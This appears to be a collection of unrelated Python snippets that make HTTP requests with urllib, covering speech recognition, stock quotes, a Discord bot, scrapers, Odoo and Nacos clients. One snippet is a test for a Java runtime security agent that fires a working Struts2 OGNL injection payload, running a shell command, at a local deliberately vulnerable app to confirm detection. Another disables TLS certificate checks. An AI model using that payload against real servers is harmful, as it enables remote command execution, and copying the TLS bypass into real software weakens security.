def run(self): message = "[INFO]: {} Run!".format( str(datetime.datetime.now()).split('.')[0]) write_log(message=message, file_=os.path.join(LOG_DIR, 'run.log')) repeat = 0 while True: try: speech_data = self.__pipe.recv() except EOFError as e: # 这里有个bug我解决不好,暂时用这种限定重复上限的方式break程序避免错误,连续进入20次收到error的信息时break repeat += 1 if repeat > 20: message = "[ERROR]: {} Nothing received! Out of max repeat times! Break!\n".format( str(datetime.datetime.now()).split('.')[0]) message += "[ERROR]: {} \n".format( str(datetime.datetime.now()).split('.')[0]) message += traceback.format_exc() write_log(message=message, file_=os.path.join(LOG_DIR, 'error.log')) print( "[ERROR]: Nothing received! Out of max repeat times! Break!" ) break message = "[Warning]: {} Nothing received!".format( str(datetime.datetime.now()).split('.')[0]) write_log(message=message, file_=os.path.join(LOG_DIR, 'warning.log')) print("[Warning]: Nothing received!") continue # 避免的时候如果出现收到数据则更新 repeat = 0 if speech_data == 'stop': break length = len(speech_data) if length == 0: message = "[ERROR]: {} Data length 0 bytes!".format( str(datetime.datetime.now()).split('.')[0]) write_log(message=message, file_=os.path.join(LOG_DIR, 'error.log')) print("[ERROR]: Data length 0 bytes!") self.__pipe.send(['']) # for i in range(3): else: speech = base64.b64encode(speech_data) speech = str(speech, 'utf-8') params = { 'dev_pid': self.dev_pid, # "lm_id" : LM_ID, #测试自训练平台开启此项 'format': self.format, 'rate': self.rate, 'token': self.token, 'cuid': self.cuid, 'channel': 1, 'speech': speech, 'len': length } post_data = json.dumps(params, sort_keys=False) # print post_data req = Request(self.as_url, post_data.encode('utf-8')) req.add_header('Content-Type', 'application/json') try: f = urlopen(req) result_str = f.read() message = "[INFO]: {} Request finished!".format( str(datetime.datetime.now()).split('.')[0]) write_log(message=message, file_=os.path.join(LOG_DIR, 'run.log')) except URLError as err: result_str = err.reason message = "[ERROR]: {} Asr http response reason : {}.".format( str(datetime.datetime.now()).split('.')[0], str(result_str)) write_log(message=message, file_=os.path.join(LOG_DIR, 'error.log')) print('[ERROR] Asr http response reason :', str(result_str)) result_str = str(result_str, 'utf-8') result_str = json.loads(result_str) if 'result' in result_str: print(result_str['result']) self.__pipe.send(result_str['result']) else: self.__pipe.send(['']) message = "[INFO]: {} Sr finished!".format( str(datetime.datetime.now()).split('.')[0]) write_log(message=message, file_=os.path.join(LOG_DIR, 'run.log'))
def get_realtime_quotes(symbols=None): """ 获取实时交易数据 getting real time quotes data 用于跟踪交易情况(本次执行的结果-上一次执行的数据) Parameters ------ symbols : string, array-like object (list, tuple, Series). return ------- DataFrame 实时交易数据 属性:0:name,股票名字 1:open,今日开盘价 2:pre_close,昨日收盘价 3:price,当前价格 4:high,今日最高价 5:low,今日最低价 6:bid,竞买价,即“买一”报价 7:ask,竞卖价,即“卖一”报价 8:volumn,成交量 maybe you need do volumn/100 9:amount,成交金额(元 CNY) 10:b1_v,委买一(笔数 bid volume) 11:b1_p,委买一(价格 bid price) 12:b2_v,“买二” 13:b2_p,“买二” 14:b3_v,“买三” 15:b3_p,“买三” 16:b4_v,“买四” 17:b4_p,“买四” 18:b5_v,“买五” 19:b5_p,“买五” 20:a1_v,委卖一(笔数 ask volume) 21:a1_p,委卖一(价格 ask price) ... 30:date,日期; 31:time,时间; """ symbols_list = '' if isinstance(symbols, list) or isinstance(symbols, set) or isinstance( symbols, tuple) or isinstance(symbols, pd.Series): for code in symbols: symbols_list += ct._code_to_symbol(code) + ',' else: symbols_list = ct._code_to_symbol(symbols) symbols_list = symbols_list[:-1] if len(symbols_list) > 8 else symbols_list request = Request( ct.LIVE_DATA_URL % (ct.P_TYPE['http'], ct.DOMAINS['sinahq'], _random(), symbols_list)) text = urlopen(request, timeout=10).read() text = text.decode('GBK') reg = re.compile(r'\="(.*?)\";') data = reg.findall(text) regSym = re.compile(r'(?:sh|sz)(.*?)\=') syms = regSym.findall(text) data_list = [] syms_list = [] for index, row in enumerate(data): if len(row) > 1: data_list.append([astr for astr in row.split(',')]) syms_list.append(syms[index]) if len(syms_list) == 0: return None df = pd.DataFrame(data_list, columns=ct.LIVE_DATA_COLS) df = df.drop('s', axis=1) df['code'] = syms_list ls = [cls for cls in df.columns if '_v' in cls] for txt in ls: df[txt] = df[txt].map(lambda x: x[:-2]) return df
def main(): h = homebase_dir.HomebaseMock(""" projectId=PROJECT_ID homeBaseUrl=file://OUTPUT_PATH/ logTo=stderr heartBeatIntervalMs=500 reportIntervalMs=1000 """) subprocess.check_output(['mvn', '-q', 'tomcat7:help'], cwd='java-goof') opts_env = os.environ.copy() opts_env['MAVEN_OPTS'] = '-javaagent:{}=file://{}'.format( path.join(os.getcwd(), 'build/libs/snyk-java-runtime-agent.jar'), h.config_path) victim = subprocess.Popen(['mvn', 'tomcat7:run'], env=opts_env, cwd='java-goof') atexit.register(lambda: victim.kill()) tomcat = 'http://*****:*****@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(" "#_memberAccess=#dm):((#container=#context[" "'com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(" "@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear(" ")).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(" "#cmd='pwd').(#cmds={'/bin/bash','-c',#cmd}).(#p=new java.lang.ProcessBuilder(#cmds)).(" "#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(" "@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(" "@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" }) # run the exploit with urlopen(req) as _: pass # wait for an agent report sleep(2) victim.terminate() sleep(1) # this segment is purely for documentation generation doc_events = dict() doc_heartbeat = dict() doc_metadata = dict() for doc in h.all_seen_docs(): if 'eventsToSend' in doc: print() doc_events = doc json.dump(doc, sys.stdout) if 'heartbeat' in doc: print() doc_heartbeat = doc json.dump(doc, sys.stdout) if 'loadedSources' in doc: doc_metadata = doc print('\n\n>>> events document:') json.dump(doc_events, sys.stdout) print('\n\n>>> heartbeat document:') json.dump(doc_heartbeat, sys.stdout) print('\n\n>>> metadata document:') json.dump(doc_metadata, sys.stdout) success = False for event in h.all_seen_events(): success = success or event['methodEntry']['methodName'].startswith( 'org/apache/struts2/dispatcher/multipart/JakartaMultiPartRequest') if not success: print('\n\nNo events matched:') for event in h.all_seen_events(): json.dump(event, sys.stdout) print() sys.exit(4) print('\n\nSuccess!')
async def overwatch(self, ctx, name, tag): url = f"http://owapi.io/profile/pc/asia/{name}-{tag}" req = Request(url, headers={'User-Agent': 'Mozilla/5.0'}) webpage = urlopen(req).read() output = json.loads(webpage) username = output['username'] level = output['level'] competitive = output['competitive'] tanker = output['competitive']['tank']['rank'] dealer = output['competitive']['tank']['rank'] healer = output['competitive']['tank']['rank'] playtime = output['playtime'] portrait = output['portrait'] quickplaytime = output['playtime']['quickplay'] competitivetime = output['playtime']['competitive'] won = output['games']['quickplay']['won'] played = output['games']['quickplay']['played'] global TankRank if 0 <= tanker <= 1499: TankRank = "브론즈" elif 1500 <= tanker <= 1999: TankRank = "실버" elif 2000 <= tanker <= 2499: TankRank = "골드" elif 2500 <= tanker <= 2999: TankRank = "플래티넘" elif 3000 <= tanker <= 3499: TankRank = "다이아몬드" elif 3500 <= tanker <= 3999: TankRank = "마스터" elif 4000 <= tanker <= 5000: TankRank = "그랜드마스터" elif 5000 <= tanker: TankRank = "그랜드마스터 이상" global DealRank if 0 <= dealer <= 1499: DealRank = "브론즈" elif 1500 <= dealer <= 1999: DealRank = "실버" elif 2000 <= dealer <= 2499: DealRank = "골드" elif 2500 <= dealer <= 2999: DealRank = "플래티넘" elif 3000 <= dealer <= 3499: DealRank = "다이아몬드" elif 3500 <= dealer <= 3999: DealRank = "마스터" elif 4000 <= dealer <= 5000: DealRank = "그랜드마스터" elif 5000 <= dealer: DealRank = "그랜드마스터 이상" global HealRank if 0 <= tanker <= 1499: HealRank = "브론즈" elif 1500 <= healer <= 1999: HealRank = "실버" elif 2000 <= healer <= 2499: HealRank = "골드" elif 2500 <= healer <= 2999: HealRank = "플래티넘" elif 3000 <= healer <= 3499: HealRank = "다이아몬드" elif 3500 <= healer <= 3999: HealRank = "마스터" elif 4000 <= healer <= 5000: HealRank = "그랜드마스터" elif 5000 <= healer: HealRank = "그랜드마스터 이상" embed = discord.Embed(title=f'{name}#{tag} 님의 정보', colour=discord.Color.red()) embed.set_author(name=f'{ctx.author.name}', icon_url=f'{portrait}') embed.set_thumbnail(url=ctx.author.avatar_url) embed.add_field(name="레벨", value=f'{len(ctx.guild.emojis)}개', inline=False) embed.add_field( name="경쟁전", value= f"탱커 : {tanker} : {TankRank}\n딜러 : {dealer} : {DealRank}\n힐러 : {healer} : {HealRank}", inline=False) embed.add_field(name="플레이", value=f"{playtime}", inline=False) embed.set_footer(text=f"{ctx.author}", icon_url=ctx.author.avatar_url)
# Counting for duplicated misspellings for rowdata in result.values: if rowdata[1] == -1: # rowdata[1]: duplication duplicatedcount = len( result.loc[result['misspelling'] == rowdata[0]]) result.loc[result['misspelling'] == rowdata[0], 'duplication'] = duplicatedcount else: continue # Getting values from Wikipedia print('\n + Finding words misspelled on Wikipedia') for rowdata in result.values: time.sleep(0.2) if rowdata[1] < 3 and rowdata[2] == -1: # rowdata[2]: wiki tu = 'https://en.wikipedia.org/w/index.php?search=' + rowdata[0] req = Request(tu) req.add_header('User-Agent', useragent) targetpage = urlopen(req) soup = BeautifulSoup(targetpage, 'lxml') if len( soup.findAll( 'a', attrs={ 'href': re.compile( '/wiki/Wikipedia:Articles_for_creation') })) > 0: result.loc[result['misspelling'] == rowdata[0], 'wiki'] = False #result.loc[result['misspelling'] == rowdata[0], 'wikiurl'] = browser.current_url result.loc[result['misspelling'] == rowdata[0],
def get_hist_data(code=None, start=None, end=None, ktype='D', retry_count=3, pause=0.001): """ 获取个股历史交易记录 Parameters ------ code:string 股票代码 e.g. 600848 start:string 开始日期 format:YYYY-MM-DD 为空时取到API所提供的最早日期数据 end:string 结束日期 format:YYYY-MM-DD 为空时取到最近一个交易日数据 ktype:string 数据类型,D=日k线 W=周 M=月 5=5分钟 15=15分钟 30=30分钟 60=60分钟,默认为D retry_count : int, 默认 3 如遇网络等问题重复执行的次数 pause : int, 默认 0 重复请求数据过程中暂停的秒数,防止请求间隔时间太短出现的问题 return ------- DataFrame 属性:日期 ,开盘价, 最高价, 收盘价, 最低价, 成交量, 价格变动 ,涨跌幅,5日均价,10日均价,20日均价,5日均量,10日均量,20日均量,换手率 """ symbol = ct._code_to_symbol(code) url = '' if ktype.upper() in ct.K_LABELS: url = ct.DAY_PRICE_URL % (ct.P_TYPE['http'], ct.DOMAINS['ifeng'], ct.K_TYPE[ktype.upper()], symbol) elif ktype in ct.K_MIN_LABELS: url = ct.DAY_PRICE_MIN_URL % (ct.P_TYPE['http'], ct.DOMAINS['ifeng'], symbol, ktype) else: raise TypeError('ktype input error.') for _ in range(retry_count): time.sleep(pause) try: request = Request(url) lines = urlopen(request, timeout=10).read() if len(lines) < 15: #no data return None except Exception as e: print(e) else: js = json.loads(lines.decode('utf-8') if ct.PY3 else lines) cols = [] if (code in ct.INDEX_LABELS) & (ktype.upper() in ct.K_LABELS): cols = ct.INX_DAY_PRICE_COLUMNS else: cols = ct.DAY_PRICE_COLUMNS if len(js['record'][0]) == 14: cols = ct.INX_DAY_PRICE_COLUMNS df = pd.DataFrame(js['record'], columns=cols) if ktype.upper() in ['D', 'W', 'M']: df = df.applymap(lambda x: x.replace(u',', u'')) df[df == ''] = 0 for col in cols[1:]: df[col] = df[col].astype(float) if start is not None: df = df[df.date >= start] if end is not None: df = df[df.date <= end] if (code in ct.INDEX_LABELS) & (ktype in ct.K_MIN_LABELS): df = df.drop('turnover', axis=1) df = df.set_index('date') df = df.sort_index(ascending=False) return df raise IOError(ct.NETWORK_URL_ERROR_MSG)
def wait(player_response, config): # If it hasn't started yet, we wait until a short amount of time before # the scheduled start time, and then start polling. This will probably # be less disruptive than constantly polling for hours and hours. # microformat.playerMicroformatRenderer.liveBroadcastDetails.startTimestamp is less deep in there but would require us to parse a ISO8601 datetime (oh no) scheduled_start = int( player_response['playabilityStatus']['liveStreamability'] ['liveStreamabilityRenderer']['offlineSlate'] ['liveStreamOfflineSlateRenderer']['scheduledStartTime']) total_wait = scheduled_start - time.time() log.info( f'Stream is scheduled to start at {scheduled_start} (in {timedelta(seconds=total_wait)})' ) if total_wait > POLL_THRESHOLD_SECS: long_sleep = total_wait - POLL_THRESHOLD_SECS log.info( f'Going to sleep for {timedelta(seconds=long_sleep)} before polling' ) time.sleep(long_sleep) while True: # Use heartbeat endpoint like a real client because of rate limits # on get_video_info heartbeat_payload = innertube_payload() heartbeat_payload.update(HEARTBEAT_FIXED) with get_opener() as opener: resp = opener.open( Request( f"https://www.youtube.com/youtubei/v1/player/heartbeat?alt=json&key={INNERTUBE_API_KEY}", data=json.dumps(heartbeat_payload).encode('utf-8'), headers={ "Content-Type": 'application/json', "Host": "www.youtube.com", 'User-Agent': INNOCUOUS_UA.format( version=get_current_firefox_version()), }, )) heartbeat = json.loads(resp.read().decode('utf-8')) if 'offlineSlate' in heartbeat['playabilityStatus'][ 'liveStreamability']['liveStreamabilityRenderer']: scheduled_start = int( heartbeat['playabilityStatus']['liveStreamability'] ['liveStreamabilityRenderer']['offlineSlate'] ['liveStreamOfflineSlateRenderer']['scheduledStartTime']) total_wait = scheduled_start - time.time() if total_wait > config['ignore_wait_greater_than_s']: log.info( f"{player_response['videoDetails']['videoId']} starts too far in the future, at {scheduled_start} (in {timedelta(seconds=total_wait)})" ) sys.exit(1) elif total_wait < -config[ 'ignore_past_scheduled_start_greater_than_s']: log.info( f"{player_response['videoDetails']['videoId']} starts too far in the past, at {scheduled_start} ({timedelta(seconds=-total_wait)} ago)" ) sys.exit(1) status = heartbeat['playabilityStatus']['status'] if status == 'OK': log.info('Video is no longer upcoming, time to go') return elif status == 'UNPLAYABLE': log.info( f'Video not playable: {heartbeat["playabilityStatus"]}, giving up' ) sys.exit(1) elif status == 'LIVE_STREAM_OFFLINE': poll_delay = int( heartbeat['playabilityStatus']['liveStreamability'] ['liveStreamabilityRenderer']['pollDelayMs']) / 1000.0 log.info(f'Still offline, will sleep {poll_delay}s') time.sleep(poll_delay) else: raise NotImplementedError( f"Don't know what to do with playability status {status}: {heartbeat['playabilityStatus']}" ) # Should be unreachable...? return
from urllib.request import Request, urlopen from bs4 import BeautifulSoup import re site = 'https://www.hltv.org/results?team=4773' hdr = { 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36' } req = Request(site, headers=hdr) html = urlopen(req) bs = BeautifulSoup(html, 'html.parser') print(bs) #We need to grab the 100 most recent matches and save them.... link_list = [] for link in bs.find_all('a', {'class': 'a-reset'}): if 'href' in link.attrs: link_list.append(link.attrs['href']) with open('temp_links.txt', 'w') as f: f.write(str(link_list))
import requests import requests_html #Download and convert YT video import youtube_dl #Get last song downloaded / delete last song/video import shutil import glob import os import sys #Telegram Bot import telebot from telegram.ext import Updater from telegram.ext import CommandHandler #Get user settings import json from fake_useragent import UserAgent ua = UserAgent() header = {'User-Agent': str(ua.chrome)} ytmreq = Request( "https://music.youtube.com/watch?v=I5V7igjZlVI&list=RDAMVMI5V7igjZlVI", headers=header) webpage1 = urlopen(ytmreq).read().decode() print(webpage1) searchname = re.compile( '<img id="img" class="style-scope yt-img-shadow" alt="" width="1048" src="https://lh3.googleusercontent.com/C1kJNdZQdjxxXJzUTrvd2w0YQGkCf1yxPWMy8IuMyxzSQJPBax6qcYkS2XSc0gs8u_WLuix0d6IJqiHF=w544-h544-l90-rj">', re.IGNORECASE | re.DOTALL) copertina = re.findall(searchname, webpage1) print(copertina)
import json from urllib.request import urlopen , Request import ssl ssl._create_default_https_context = ssl._create_unverified_context req = Request("https://pokeapi.co/api/v2/", headers={'User-Agent': 'XYZ/3.0'}) webpage = urlopen(req).read() data = json.loads(webpage) # print(json.dumps(data, indent=2)) print(len(data))
def get_invite_from_code(code): """Fetch the invite object given just its code. Args: code (str): The invite code, unique to the invitation Returns: A tuple of three values. The first is a bool that indicates whether or not we successfully fetched the invite object. The second is a bool that is True if we did not successfully fetch the invite object but this may be a temporary issue, and False in all other situations. The third is a dictionary of the fetched invite object, if successful, and None in other cases. Example Invite Object: { "code": "0vCdhLbwjZZTWZLD", "guild": { "id": "165176875973476352", "name": "CS:GO Fraggers Only", "splash": null, "icon": null, "features": {} }, "channel": { "id": "165176875973476352", "name": "illuminati", "type": 0 } } """ global API_BASE global USER_AGENT req = Request(f'{API_BASE}invites/{code}') req.add_header('Accept', 'application/json') req.add_header('Content-Type', 'application/x-www-form-urlencoded') req.add_header('User-Agent', USER_AGENT) try: with urlopen(req) as res: data = json.loads(res.read().decode('utf-8')) if data['code'] == '10006': # This is a special code to indicate the link just expired return False, False, None return True, False, data except HTTPError as err: if err.code == 404: return False, False, None if err.code == 429: if 'X-RateLimit-Reset' in err.headers: reset_time = err.headers['X-RateLimit-Reset'] time_to_wait = math.ceil(reset_time - time.time()) if time_to_wait <= 0: print(f'got ratelimited when checking {code} but the reset time is in the past, trying again') return False, True, None print(f'got ratelimited when checking {code}, need to wait {time_to_wait} seconds before trying again') time.sleep(time_to_wait) return False, True, None print(f'Got error code {err.code} in HTTPResponse for code {code}') return False, True, None
def get_weather(): #fun_name, location, date = Dialogflow_Text[0],Dialogflow_Text[1],Dialogflow_Text[2] # location을 말하지않았다면 사용자 집주소 == lacation #if location == '내위치': #f = open("/home/pi/robot109/data/user_info.txt", 'r') #location = f["address"] with open('/home/pi/robot109/data/user_info.txt', 'r') as inf: location = eval(inf.read())["address"][2:-1].split(" ")[0] print(location) # enc_location 사용자가 말한 위치 enc_location = urllib.parse.quote(location + '+날씨') # enc_location위치에 날씨를 검색 url = 'https://search.naver.com/search.naver?ie=utf8&query=' + enc_location req = Request(url) page = urlopen(req) html = page.read() soup = bs4.BeautifulSoup(html, 'html5lib') soup.find('p', class_='info_temperature').find('span', class_='todaytemp').text date = "오늘" if date == '오늘': # 현재 온도 NowTemp = soup.find('span', {'class': 'todaytemp'}).text # 날씨 캐스트 WeatherCast = soup.find('p', {'class': 'cast_txt'}).text # 오늘 오전온도, 오후온도, 체감온도 TodayMorningTemp = soup.find('span', {'class': 'min'}).text[:-1] TodayAfternoonTemp = soup.find('span', {'class': 'max'}).text[:-1] TodayFeelTemp = soup.find('span', {'class': 'sensible'}).text[5:-1] # 자외선 지수 TodayUV = soup.find('span', { 'class': 'indicator' }).text[4:-2] + " " + soup.find('span', { 'class': 'indicator' }).text[-2:] # 미세먼지, 초미세먼지, 오존 지수 CheckDust1 = soup.find('div', {'class': 'sub_info'}) CheckDust2 = CheckDust1.find('div', {'class': 'detail_box'}) CheckDust = [] for i in CheckDust2.select('dd'): CheckDust.append(i.text) FineDust = CheckDust[0][:-2] + " " + CheckDust[0][-2:] UltraFineDust = CheckDust[1][:-2] + " " + CheckDust[1][-2:] Ozon = CheckDust[2][:-2] + " " + CheckDust[2][-2:] #print('오늘' + location + '오전 기온은'+ TodayMorningTemp +'도'+', 오후 기온은' + TodayAfternoonTemp +'도 입니다') text_Temp = '오늘 ' + location + ' 오전 기온은 ' + TodayMorningTemp + '도' + ', 오후 기온은 ' + TodayAfternoonTemp + '도 입니다' #print('체감 온도은'+ TodayFeelTemp +'도') if float(TodayFeelTemp) < 29: text_feel_temp = '체감 온도은 ' + TodayFeelTemp + '도입니다' elif 29 <= float(TodayFeelTemp) < 31: text_feel_temp = '체감 온도은 ' + TodayFeelTemp + '도로 더운 날씨에요, 할아버지 야외 활동을 자제해주세요' elif 31 <= float(TodayFeelTemp) < 37: text_feel_temp = '체감 온도은 ' + TodayFeelTemp + '도로 무더운 날씨에요, 할아버지 에어컨을 켜주세요.' elif 37 <= float(TodayFeelTemp): text_feel_temp = '체감 온도은 ' + TodayFeelTemp + '도로 폭염이에요, 할아버지 야외 활동을 자제하고 꼭 에어컨을 켜주세요' with open('/home/pi/robot109/data/weather.txt', 'w') as inf: inf.write(text_Temp + ". " + text_feel_temp) return text_Temp + ". " + text_feel_temp elif date == '내일': # 내일 오전, 오후 온도 및 상태 체크 tomorrowArea = soup.find('div', {'class': 'tomorrow_area'}) tomorrowCheck = tomorrowArea.find_all( 'div', {'class': 'main_info morning_box'}) # 내일 오전온도 tomorrowMoring = tomorrowCheck[0].find('span', { 'class': 'todaytemp' }).text # 내일 오전상태 tomorrowMState1 = tomorrowCheck[0].find('div', {'class': 'info_data'}) tomorrowMState2 = tomorrowMState1.find('ul', {'class': 'info_list'}) tomorrowMState3 = tomorrowMState2.find('p', {'class': 'cast_txt'}).text tomorrowMState4 = tomorrowMState2.find('div', {'class': 'detail_box'}) tomorrowMState5 = tomorrowMState4.find('span').text.strip() tomorrowMState = tomorrowMState3 + " " + tomorrowMState5 # 내일 오후온도 tomorrowAfter_info = tomorrowCheck[1].find( 'p', {'class': 'info_temperature'}) tomorrowAfter = tomorrowAfter_info.find('span', { 'class': 'todaytemp' }).text # 내일 오후상태 tomorrowAState1 = tomorrowCheck[1].find('div', {'class': 'info_data'}) tomorrowAState2 = tomorrowAState1.find('ul', {'class': 'info_list'}) tomorrowAState3 = tomorrowAState2.find('p', {'class': 'cast_txt'}).text tomorrowAState4 = tomorrowAState2.find('div', {'class': 'detail_box'}) tomorrowAState5 = tomorrowAState4.find('span').text.strip() tomorrowAState = tomorrowAState3 + " " + tomorrowAState5 #print('내일 ' + location + ' 오전 기온은 '+ tomorrowMoring +'도'+', 오후 기온은 ' + tomorrowAfter +'도 입니다') text_Temp = '내일 ' + location + ' 오전 기온은 ' + tomorrowMoring + '도' + ', 오후 기온은 ' + tomorrowAfter + '도 입니다' return text_Temp
def run(cls, database=DEFAULT_DB_ALIAS, **kwargs): import frepple # Uncomment the following lines to bypass the connection to odoo and use # a XML flat file alternative. This can be useful for debugging. # with open("my_path/my_data_file.xml", 'rb') as f: # frepple.readXMLdata(f.read().decode('utf-8'), False, False) # frepple.printsize() # return odoo_user = Parameter.getValue("odoo.user", database) odoo_password = settings.ODOO_PASSWORDS.get(database, None) if not settings.ODOO_PASSWORDS.get(database): odoo_password = Parameter.getValue("odoo.password", database) odoo_db = Parameter.getValue("odoo.db", database) odoo_url = Parameter.getValue("odoo.url", database) odoo_company = Parameter.getValue("odoo.company", database) ok = True # Set debugFile=PathToXmlFile if you want frePPLe to read that file # rather than the data at url # else leave it to False debugFile = False # "c:/temp/frepple_data.xml" if not odoo_user and not debugFile: logger.error("Missing or invalid parameter odoo.user") ok = False if not odoo_password and not debugFile: logger.error("Missing or invalid parameter odoo.password") ok = False if not odoo_db and not debugFile: logger.error("Missing or invalid parameter odoo.db") ok = False if not odoo_url and not debugFile: logger.error("Missing or invalid parameter odoo.url") ok = False if not odoo_company and not debugFile: logger.error("Missing or invalid parameter odoo.company") ok = False odoo_language = Parameter.getValue("odoo.language", database, "en_US") if not ok and not debugFile: raise Exception("Odoo connector not configured correctly") # Assign to single roots root_item = None for r in frepple.items(): if r.owner is None: root_item = r break root_customer = None for r in frepple.customers(): if r.owner is None: root_customer = r break root_location = None for r in frepple.locations(): if r.owner is None: root_location = r break # Connect to the odoo URL to GET data try: loglevel = int(Parameter.getValue("odoo.loglevel", database, "0")) except Exception: loglevel = 0 if not debugFile: url = "%sfrepple/xml?%s" % ( odoo_url, urlencode({ "database": odoo_db, "language": odoo_language, "company": odoo_company, "mode": cls.mode, }), ) try: request = Request(url) encoded = base64.encodestring( ("%s:%s" % (odoo_user, odoo_password)).encode("utf-8"))[:-1] request.add_header("Authorization", "Basic %s" % encoded.decode("ascii")) except HTTPError as e: logger.error("Error connecting to odoo at %s: %s" % (url, e)) raise e # Download and parse XML data with urlopen(request) as f: frepple.readXMLdata(f.read().decode("utf-8"), False, False, loglevel) else: # Download and parse XML data with open(debugFile) as f: frepple.readXMLdata(f.read(), False, False, loglevel) # Assure single root hierarchies for r in frepple.items(): if r.owner is None and r != root_item: r.owner = root_item for r in frepple.customers(): if r.owner is None and r != root_customer: r.owner = root_customer for r in frepple.locations(): if r.owner is None and r != root_location: r.owner = root_location
def _do_sync_req(self, url, headers=None, params=None, data=None, timeout=None, method="GET"): if self.username and self.password: if not params: params = {} params.update({ "username": self.username, "password": self.password }) url = "?".join([url, urlencode(params)]) if params else url all_headers = self._get_common_headers(params, data) if headers: all_headers.update(headers) logger.debug( "[do-sync-req] url:%s, headers:%s, params:%s, data:%s, timeout:%s" % (url, all_headers, params, data, timeout)) tries = 0 while True: try: server_info = self.get_server() if not server_info: logger.error("[do-sync-req] can not get one server.") raise NacosRequestException("Server is not available.") address, port = server_info server = ":".join([address, str(port)]) server_url = "%s://%s" % ("http", server) if python_version_bellow("3"): req = Request( url=server_url + url, data=urlencode(data).encode() if data else None, headers=all_headers) req.get_method = lambda: method else: req = Request( url=server_url + url, data=urlencode(data).encode() if data else None, headers=all_headers, method=method) # build a new opener that adds proxy setting so that http request go through the proxy if self.proxies: proxy_support = ProxyHandler(self.proxies) opener = build_opener(proxy_support) resp = opener.open(req, timeout=timeout) else: # for python version compatibility if python_version_bellow("2.7.9"): resp = urlopen(req, timeout=timeout) else: resp = urlopen(req, timeout=timeout, context=None) logger.debug("[do-sync-req] info from server:%s" % server) return resp except HTTPError as e: if e.code in [ HTTPStatus.INTERNAL_SERVER_ERROR, HTTPStatus.BAD_GATEWAY, HTTPStatus.SERVICE_UNAVAILABLE ]: logger.warning( "[do-sync-req] server:%s is not available for reason:%s" % (server, e.msg)) else: raise except socket.timeout: logger.warning("[do-sync-req] %s request timeout" % server) except URLError as e: logger.warning("[do-sync-req] %s connection error:%s" % (server, e.reason)) tries += 1 if tries >= len(self.server_list): logger.error( "[do-sync-req] %s maybe down, no server is currently available" % server) raise NacosRequestException("All server are not available") self.change_server() logger.warning("[do-sync-req] %s maybe down, skip to next" % server)
#!/usr/bin/env python # -*- encoding: utf-8 -*- from urllib.request import Request, urlopen from urllib.parse import urlencode url = 'http://httpbin.org/post' headers = { 'User-Agent': 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)', 'Host': 'httpbin.org' } dict = {'name': 'TonyXu'} data = bytes(urlencode(dict), encoding='utf8') if __name__ == '__main__': req = Request(url, data=data, headers=headers, method='POST') res = urlopen(req) print(res.read().decode('utf-8'))
article_text)) # filter to remove the byline, timestamp and updated paragraphs from the block text # when accessing a politico states article def validate_state_paragraphs(class_name): excluded_classes = ['byline', 'timestamp', 'updated'] if class_name in excluded_classes: return False return True # validation performed to ensure the user entered the correct url if re.match('https://(www.)*politico.com/.+', url) is None: print('please enter a valid link to a politico article') elif re.match('https://(www.)*politico.com/video(.*)', url) is not None: print('sorry. I do not scrape politico video links') elif re.match('https://(www.)*politico.com/newsletters(.*)', url) is not None: print('sorry. I do not scrape politico newsletter links') else: try: req = Request(url, headers={'User-Agent': 'Mozilla/5.0'}) html = urlopen(req).read().decode('utf-8') soup = BeautifulSoup(html, 'html.parser') parse_text(soup) except: print('there was a problem scraping the data')
'tok': token, 'tex': tex, 'per': PER, 'spd': SPD, 'pit': PIT, 'vol': VOL, 'aue': AUE, 'cuid': CUID, 'lan': 'zh', 'ctp': 1 } # lan ctp 固定参数 data = urlencode(params) print('test on Web Browser' + TTS_URL + '?' + data) req = Request(TTS_URL, data.encode('utf-8')) has_error = False try: f = urlopen(req) result_str = f.read() has_error = ('Content-Type' not in f.headers.keys() or f.headers['Content-Type'].find('audio/') < 0) except URLError as err: print('asr http response http code : ' + str(err.code)) result_str = err.read() has_error = True save_file = "error.txt" if has_error else 'result.' + FORMAT with open(save_file, 'wb') as of:
def run(cls, database=DEFAULT_DB_ALIAS, **kwargs): import frepple odoo_user = Parameter.getValue("odoo.user", database) odoo_password = settings.ODOO_PASSWORDS.get(database, None) if not settings.ODOO_PASSWORDS.get(database): odoo_password = Parameter.getValue("odoo.password", database) odoo_db = Parameter.getValue("odoo.db", database) odoo_url = Parameter.getValue("odoo.url", database) odoo_company = Parameter.getValue("odoo.company", database) ok = True if not odoo_user: logger.error("Missing or invalid parameter odoo.user") ok = False if not odoo_password: logger.error("Missing or invalid parameter odoo.password") ok = False if not odoo_db: logger.error("Missing or invalid parameter odoo.db") ok = False if not odoo_url: logger.error("Missing or invalid parameter odoo.url") ok = False if not odoo_company: logger.error("Missing or invalid parameter odoo.company") ok = False odoo_language = Parameter.getValue("odoo.language", database, "en_US") if not ok: raise Exception("Odoo connector not configured correctly") boundary = email.generator._make_boundary() # Generator function # We generate output in the multipart/form-data format. # We send the connection parameters as well as a file with the planning # results in XML-format. # TODO respect the parameters odoo.filter_export_purchase_order, odoo.filter_export_manufacturing_order, odoo.filter_export_distribution_order # these are python expressions - attack-sensitive evaluation! def publishPlan(cls): yield "--%s\r" % boundary yield 'Content-Disposition: form-data; name="webtoken"\r' yield "\r" yield "%s\r" % jwt.encode( { "exp": round(time.time()) + 600, "user": odoo_user }, settings.DATABASES[database].get("SECRET_WEBTOKEN_KEY", settings.SECRET_KEY), algorithm="HS256", ).decode("ascii") yield "--%s\r" % boundary yield 'Content-Disposition: form-data; name="database"\r' yield "\r" yield "%s\r" % odoo_db yield "--%s\r" % boundary yield 'Content-Disposition: form-data; name="language"\r' yield "\r" yield "%s\r" % odoo_language yield "--%s\r" % boundary yield 'Content-Disposition: form-data; name="company"\r' yield "\r" yield "%s\r" % odoo_company yield "--%s\r" % boundary yield 'Content-Disposition: file; name="frePPLe plan"; filename="frepple_plan.xml"\r' yield "Content-Type: application/xml\r" yield "\r" yield '<?xml version="1.0" 